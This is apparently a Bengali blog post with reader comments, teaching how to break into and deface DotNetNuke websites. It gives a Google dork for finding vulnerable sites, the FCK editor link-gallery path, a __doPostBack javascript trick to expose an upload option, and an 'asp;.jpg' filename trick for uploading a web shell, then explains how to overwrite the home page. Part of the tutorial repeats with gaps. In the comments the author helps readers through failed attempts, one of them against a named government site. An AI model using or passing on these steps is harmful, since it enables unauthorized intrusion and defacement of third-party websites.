প্রয়োজনীয় ঃ ১. Mozilla Firefox v.4 -> ডাউনলোড করুন এখান থেকে
২. Mantra browser -> ডাউনলোড করুন এখান থেকে (WinXP) , Portable version ,
এখন www.google.com এ যায়ে উপরের dork টি লিখে সার্চ দিলে নিচের screenshot এর মত result আসবে।
(Screenshot 1)
এবার এখান থেকে যেকোনো একটি সাইট এর ঠিকানা কপি করি এবং তার শেষ এ inurl:/tabid/36/language/en-US/Default.aspx বাদ দিয়ে /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx এইটুকু সংযুক্ত করি। এখন নির্বাচিত সাইট টির কপি করা ঠিকানা যদি হয় www.copysite.com তাহলে সম্পূর্ণ ঠিকানাটি হবে
www.copysite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
এবার www.copysite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx ঠিকানায় গেলে নিচের screenshot 2 এর মত আসবে.এখান থেকে ৩ নং অপশনটি (File (On File di questo sito)[english:on this site]) বাছাই করতে হবে
(Screenshot 2)
বিঃদ্রঃ যদি Screenshot 2 এর মত না এসে Screenshot 3 এর মত আসে তাহলে বুঝতে হবে সাইট টি হ্যাক করা যাবে না।
(Screenshot 3)
ধরে নেই Screenshot 2 এর মত ফলাফল আসছে। এবার এ address bar এ "javascript :__doPostBack('ctlURL$cmdUpload','')" {quote ব্যতিত } javascript টি টাইপ করে এন্টার চাপলে নিচের মত ফলাফল আসবে
Screenshot 4
অর্থাৎ আপনি upload অপশনটি পেয়ে গেলেন। এখন Root সিলেক্ট করে shell upload করুন। Upload শেষ এ www.copysite.com/portals/0/yourshellname.asp;.jpg ঠিকানায় যান।
উদাহরন ঃ http://www.copysite./portals/0/demon.asp;.jpg
Screenshot 5 এর মত আসবে
(Screenshot 5)
<dir> এ ক্লিক করতে থাকুন,admin panel আসলে UPLOAD FILE TO C:\WEBSITES\WWW.COPYSITE.COM\WEBSITE\ এ ক্লিক করুন এবং deface page upload করুন। তাহলে আপনার হ্যাক করা সাইটটি হবে
www.copysite.com/deface.html (deface=আপনার deface page এর নাম)।
যদি main পেজ deface করতে চান তাহলে admin dir এ ক্লিক করে index.html অথবা html পেজ টি খুজে বের করুন এবং টা এডিট করে আপনার deface পেজ এর কোড গুলো দিয়ে মাইন পেজ এর কোড গুলো replace করে দিন ।
যারা .swf format এ ফাইল আপলোড করতে চান তারা swf file creator download করে নিন এখান থেকে
কপিরাইট@ইলুমিনেট ডেমন
( Google Chrome ব্যবহার করাও কাজ করতে পারবেন )
এই মেথড এ ওয়েবসাইট হ্যাক করতে প্রথমে DNN vulnerable সাইট বের করতে হবে। এ জন্য dork এর মাধ্যমে DNN vulnerable সাইট বের করে নেব। উদাহরন হিসেবে inurl:/tabid/36/language/en-US/Default.aspx এই dork টি নিনাম।এখন www.google.com এ যায়ে উপরের dork টি লিখে সার্চ দিলে নিচের screenshot এর মত result আসবে।
(Screenshot 1)
এবার এখান থেকে যেকোনো একটি সাইট এর ঠিকানা কপি করি এবং তার শেষ এ inurl:/tabid/36/language/en-US/Default.aspx বাদ দিয়ে /Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx এইটুকু সংযুক্ত করি। এখন নির্বাচিত সাইট টির কপি করা ঠিকানা যদি হয় www.copysite.com তাহলে সম্পূর্ণ ঠিকানাটি হবে
www.copysite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
এবার www.copysite.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx ঠিকানায় গেলে নিচের screenshot 2 এর মত আসবে.এখান থেকে ৩ নং অপশনটি (File (On File di questo sito)[english:on this site]) বাছাই করতে হবে
(Screenshot 2)
(Screenshot 3)
Screenshot 4
উদাহরন ঃ http://www.copysite./portals/0/demon.asp;.jpg
Screenshot 5 এর মত আসবে
(Screenshot 5)
www.copysite.com/deface.html (deface=আপনার deface page এর নাম)।
যদি main পেজ deface করতে চান তাহলে admin dir এ ক্লিক করে index.html অথবা html পেজ টি খুজে বের করুন এবং টা এডিট করে আপনার deface পেজ এর কোড গুলো দিয়ে মাইন পেজ এর কোড গুলো replace করে দিন ।
যারা .swf format এ ফাইল আপলোড করতে চান তারা swf file creator download করে নিন এখান থেকে
কপিরাইট@ইলুমিনেট ডেমন
Darun Hoiase Brother
ReplyDeleteধন্যবাদ bro
Deletegoogle crome er jnno kottheke dwnld krbo????
ReplyDelete@rubaii bro,,,google crome a ai method kaj korbe na..mozilla firefox 4 or mantra browser use korte hobe..firefox 4 & mantra r download link blog er suru te dao a asa dakhun.
Deletehumm , xotil hoise bro,
ReplyDeleteIIS method ar upor akta post dile valo hoy :)
apnar montobber jonno thnx..IIS method er upor post dao r try korbo..asa kori satha thakben.
DeleteThis comment has been removed by the author.
ReplyDeleteকোনো একটা ওয়েবসাইটের DNN vulnerable সাইট এবং dork বের করবো কিভাবে???
ReplyDeletewww.google.com এ inurl:/tabid/36/language/en-US/Default.aspx লিখে সার্চ দিলাম। এরপর www.gopunjab.in/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx লিখে সার্চ করলাম। কিন্তু did not match dekhacche.
কি করবো এখন???
bt ami to abr search dia dakhlam..sob to thik e asa..
ReplyDeleteURL (Un Link ad una risorsa esterna) এটা সিলেক্ট করার পর আপনি বলেছেন javascript লিখতে কিন্তু কি লিখব বুজতে পারছি না :(
ReplyDelete"javascript:__doPostBack(‘ctlURL$cmdUpload’,”)" {quote ব্যতিত } এই javascript টা address bar এ লিখে সাবমিট করুন।
ReplyDeleteapni to .asp file .txt format a upload korsen..that's why amn likha ascha..check that
ReplyDeletepost ta valo vabe poren asa kori paya jaben
ReplyDeletethank
ReplyDelete